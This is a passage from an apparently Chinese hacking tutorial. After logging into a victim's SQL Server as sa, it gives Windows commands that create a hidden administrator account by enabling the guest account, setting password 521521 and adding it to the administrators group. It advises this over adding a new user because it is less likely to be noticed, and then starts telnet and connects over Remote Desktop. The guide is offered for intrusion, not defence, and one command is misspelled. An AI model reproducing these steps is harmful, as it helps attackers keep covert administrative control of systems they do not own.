这样就表示连接成功,大家都知道sa是SQL数据库的管理员,所以可以执行任意指令,我们就在
DOS Commamd输入:
net user root 521521 /add
net localgroup administrators root /add
文章看多了也应该知道这是什么意思了吧?不用说了。看到成功的提示了,如图:
但我还是建议不要添加用户,否则很容易被看穿,所以我建议你在guest这个用户上做手脚,输入下面命令:
net user guest /adtive:yes
net user guest 521521
net localgroup administrators guest /add
就这样就激活了guest这个帐号,并把它的密码设为521521,还添加进管理员组,如果帐号本来就是的活的,就直接输入倒数两行命令就可以了,别忘了,如果目标主机没有开23端口的话,记得为它运行远程登陆服务,输入:net start telnet。现在我们有管理员帐号了,想做什么还不随心所欲?这台主机还开了3389端口,赶快用“终端服务客户端”(收藏在“黑客入侵必备工具包”里面),连接上去,就像操作自己的电脑一样,如下图: